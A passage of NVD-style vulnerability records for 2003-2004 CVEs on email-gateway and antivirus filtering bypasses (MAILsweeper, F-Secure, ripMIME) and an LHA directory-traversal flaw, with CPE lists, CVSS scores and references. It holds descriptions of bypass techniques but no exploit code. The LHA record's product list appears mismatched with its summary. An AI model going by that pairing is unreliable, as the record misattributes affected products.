              "matchCriteriaId": "A5129FD4-C011-4EA9-B8A1-256E95494FE6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F33D78C-9CD1-49A6-A43E-D0187600C033",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6D3CF1D-64E1-47DB-8767-EF8DBF4E17AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E725208-BA0C-41D9-BC45-84577A94AAA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "A43C3DCC-3298-4D4D-9485-4A3BECB615E9",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use non-standard but frequently supported Content-Transfer-Encoding values such as (1) uuencode, (2) mac-binhex40, and (3) yenc, which may be interpreted differently by mail clients."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples productos de pasarelas de seguridad de contenidos y antivirus pueden permitir a atacantes remotos saltarse restricciones de contenido mediante mensajes MIME que usan valores Content-Transfer-Encoding no est\u00e1ndar pero ampliamente soportados, como (1) uuencode, (2) mac-binhex40, y (3) yenc, lo que puede ser interpretado de manera distinta por clientes de correo."
    }
  ],
  "id": "CVE-2004-0051",
  "lastModified": "2024-11-20T23:47:38.883",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2004-10-20T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=109517788100063\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17337"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=109517788100063\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17337"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2004-09-28 04:00
Modified
2024-11-20 23:45
Severity ?
Summary
Clearswift MAILsweeper before 4.3.15 does not properly detect and filter RAR 3.20 encoded files, which allows remote attackers to bypass intended policy.
Impacted products
Vendor Product Version
clearswift mailsweeper *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "09D10925-2F78-40C9-9B32-08C689D6412D",
              "versionEndIncluding": "4.3.15",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Clearswift MAILsweeper before 4.3.15 does not properly detect and filter RAR 3.20 encoded files, which allows remote attackers to bypass intended policy."
    },
    {
      "lang": "es",
      "value": "Clearswift MAILsweepe anteriores a 4.3.15 no detecta y filtra adecuadamente ficheros codificados RAR 3.20, lo que permite a atacantes remotos saltarse la pol\u00edtica pretendida."
    }
  ],
  "id": "CVE-2003-0928",
  "lastModified": "2024-11-20T23:45:48.283",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2004-09-28T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=109241692108678\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.corsaire.com/advisories/c030807-001.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=109241692108678\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.corsaire.com/advisories/c030807-001.txt"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2004-10-20 04:00
Modified
2024-11-20 23:47
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use RFC2231 encoding, which may be interpreted differently by mail clients.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA12B965-672C-444D-9774-0F76FE47EA29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6C9B32C-5EC9-46BD-AA77-F414A143576C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "823C27EB-C00F-4A7E-B832-013A50A1EE2D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "BD217379-28E7-465E-843D-E7204EE0E89F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB96CB8A-59F3-4624-B2BA-687ECF929B79",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "04A02C12-547E-4086-A409-53AA68F1A4D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "8185FBF2-D678-4D90-A5AC-F9B06DFED95F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F4EC2BB-A979-4C37-B8BB-086DAEEB4A6A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD53E1BC-6A92-4D7C-BE1F-FEF88F78DBD4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC782BFC-6BA0-4823-8A6D-F7D83F55393C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E1B09025-47B9-4F77-9DA6-80885E9A4EC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E021143-608B-44A2-84FB-8F8AC00A9985",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "0A9BB1C1-2CB2-426D-A8CE-AF5CB0B98674",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AC4686E-B92F-47ED-90DA-42AF650521D2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "80EF73F0-1FE1-4041-9C07-A89D153DA41F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "EF45C4F8-A20C-4D7D-B203-AF36FB046C63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "75222D1B-1384-4C74-A54F-BC028C5CDB69",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "A5129FD4-C011-4EA9-B8A1-256E95494FE6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F33D78C-9CD1-49A6-A43E-D0187600C033",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6D3CF1D-64E1-47DB-8767-EF8DBF4E17AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E725208-BA0C-41D9-BC45-84577A94AAA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "A43C3DCC-3298-4D4D-9485-4A3BECB615E9",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use RFC2231 encoding, which may be interpreted differently by mail clients."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples productos de pasarelas de seguridad de contenidos y antivirus pueden permitir a atacantes remotos saltarse restricciones de contenido mediante mensajes MIME que usan codificicaci\u00f3n RFC2231, lo que puede ser interpretado de forma variable por clientes de correo."
    }
  ],
  "id": "CVE-2004-0161",
  "lastModified": "2024-11-20T23:47:53.900",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2004-10-20T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=109524928232568\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/9274"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=109524928232568\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/9274"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2004-10-20 04:00
Modified
2024-11-20 23:46
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use multiple MIME fields with the same name, which may be interpreted differently by mail clients.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA12B965-672C-444D-9774-0F76FE47EA29",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6C9B32C-5EC9-46BD-AA77-F414A143576C",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "823C27EB-C00F-4A7E-B832-013A50A1EE2D",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "BD217379-28E7-465E-843D-E7204EE0E89F",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB96CB8A-59F3-4624-B2BA-687ECF929B79",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "04A02C12-547E-4086-A409-53AA68F1A4D5",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "8185FBF2-D678-4D90-A5AC-F9B06DFED95F",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F4EC2BB-A979-4C37-B8BB-086DAEEB4A6A",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD53E1BC-6A92-4D7C-BE1F-FEF88F78DBD4",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC782BFC-6BA0-4823-8A6D-F7D83F55393C",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E1B09025-47B9-4F77-9DA6-80885E9A4EC4",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E021143-608B-44A2-84FB-8F8AC00A9985",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "0A9BB1C1-2CB2-426D-A8CE-AF5CB0B98674",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AC4686E-B92F-47ED-90DA-42AF650521D2",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "80EF73F0-1FE1-4041-9C07-A89D153DA41F",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "EF45C4F8-A20C-4D7D-B203-AF36FB046C63",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "75222D1B-1384-4C74-A54F-BC028C5CDB69",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "A5129FD4-C011-4EA9-B8A1-256E95494FE6",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F33D78C-9CD1-49A6-A43E-D0187600C033",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6D3CF1D-64E1-47DB-8767-EF8DBF4E17AE",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E725208-BA0C-41D9-BC45-84577A94AAA1",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "A43C3DCC-3298-4D4D-9485-4A3BECB615E9",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use multiple MIME fields with the same name, which may be interpreted differently by mail clients."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples pasarelas de seguridad de contenidos y antivirus pueden permitir a atacantes remotos saltarse restricciones de contenido mediante mensajes MIME que usan m\u00faltiples campos MIME con el mismo nombre, lo que puede ser interpretado de manera distinta por clientes de correo."
    }
  ],
  "id": "CVE-2003-1014",
  "lastModified": "2024-11-20T23:46:09.237",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2004-10-20T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=109517732328759\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17333"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=109517732328759\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17333"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2003-12-31 05:00
Modified
2024-11-20 23:47
Severity ?
Summary
Clearswift MAILsweeper 4.0 through 4.3.7 allows remote attackers to bypass filtering via a file attachment that contains "multiple extensions combined with large blocks of white space."



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EFE4FA19-F2EA-4292-A441-2E4A39366942",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FA5D7FD1-D5AB-4987-801A-FA464C31298A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "772710C7-41FE-47E2-B0D7-A3C8D36C8808",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "7358AD98-44C1-4CC4-BD50-CFF3822F3A96",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "AAA1C283-E518-4BC6-BBF0-FCE09F9E0F17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B8A74FB-07B0-42D6-ABF3-D7A073A329E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "49668AFD-4821-4D5A-BEBD-DF55A8AB58C6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "57E0BFFD-D777-43A5-AEE8-765F55C86E93",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.6_sp1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DAF9A151-6EBF-4760-A154-A34FF7C9E632",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA12B965-672C-444D-9774-0F76FE47EA29",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Clearswift MAILsweeper 4.0 through 4.3.7 allows remote attackers to bypass filtering via a file attachment that contains \"multiple extensions combined with large blocks of white space.\""
    }
  ],
  "id": "CVE-2003-1485",
  "lastModified": "2024-11-20T23:47:16.170",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2003-12-31T05:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://www.clearswift.com/download/bin/Patches/ReadMe_SMTP_438.htm"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/7568"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.clearswift.com/download/bin/Patches/ReadMe_SMTP_438.htm"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/7568"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2004-08-18 04:00
Modified
2024-11-20 23:48
Severity ?
Summary
Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes ("//absolute/path").
References
cve@mitre.orghttp://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000840
cve@mitre.orghttp://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html
cve@mitre.orghttp://marc.info/?l=bugtraq&m=108422737918885&w=2
cve@mitre.orghttp://security.gentoo.org/glsa/glsa-200405-02.xml
cve@mitre.orghttp://www.debian.org/security/2004/dsa-515
cve@mitre.orghttp://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html
cve@mitre.orghttp://www.redhat.com/support/errata/RHSA-2004-178.html
cve@mitre.orghttp://www.redhat.com/support/errata/RHSA-2004-179.html
cve@mitre.orghttp://www.securityfocus.com/bid/10243Exploit, Patch, Vendor Advisory
cve@mitre.orghttps://bugzilla.fedora.us/show_bug.cgi?id=1833
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/16013
cve@mitre.orghttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10409
cve@mitre.orghttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A978
af854a3a-2127-422b-91ae-364da2661108http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000840
af854a3a-2127-422b-91ae-364da2661108http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html
af854a3a-2127-422b-91ae-364da2661108http://marc.info/?l=bugtraq&m=108422737918885&w=2
af854a3a-2127-422b-91ae-364da2661108http://security.gentoo.org/glsa/glsa-200405-02.xml
af854a3a-2127-422b-91ae-364da2661108http://www.debian.org/security/2004/dsa-515
af854a3a-2127-422b-91ae-364da2661108http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html
af854a3a-2127-422b-91ae-364da2661108http://www.redhat.com/support/errata/RHSA-2004-178.html
af854a3a-2127-422b-91ae-364da2661108http://www.redhat.com/support/errata/RHSA-2004-179.html
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/bid/10243Exploit, Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108https://bugzilla.fedora.us/show_bug.cgi?id=1833
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/16013
af854a3a-2127-422b-91ae-364da2661108https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10409
af854a3a-2127-422b-91ae-364da2661108https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A978
Impacted products
Vendor Product Version
clearswift mailsweeper 4.0
clearswift mailsweeper 4.1
clearswift mailsweeper 4.2
clearswift mailsweeper 4.3
clearswift mailsweeper 4.3.3
clearswift mailsweeper 4.3.4
clearswift mailsweeper 4.3.5
clearswift mailsweeper 4.3.6
clearswift mailsweeper 4.3.6_sp1
clearswift mailsweeper 4.3.7
clearswift mailsweeper 4.3.8
clearswift mailsweeper 4.3.10
clearswift mailsweeper 4.3.11
clearswift mailsweeper 4.3.13
f-secure f-secure_anti-virus 4.51
f-secure f-secure_anti-virus 4.51
f-secure f-secure_anti-virus 4.51
f-secure f-secure_anti-virus 4.52
f-secure f-secure_anti-virus 4.52
f-secure f-secure_anti-virus 4.52
f-secure f-secure_anti-virus 4.60
f-secure f-secure_anti-virus 5.5
f-secure f-secure_anti-virus 5.41
f-secure f-secure_anti-virus 5.41
f-secure f-secure_anti-virus 5.41
f-secure f-secure_anti-virus 5.42
f-secure f-secure_anti-virus 5.42
f-secure f-secure_anti-virus 5.42
f-secure f-secure_anti-virus 5.52
f-secure f-secure_anti-virus 6.21
f-secure f-secure_anti-virus 2003
f-secure f-secure_anti-virus 2004
f-secure f-secure_for_firewalls 6.20
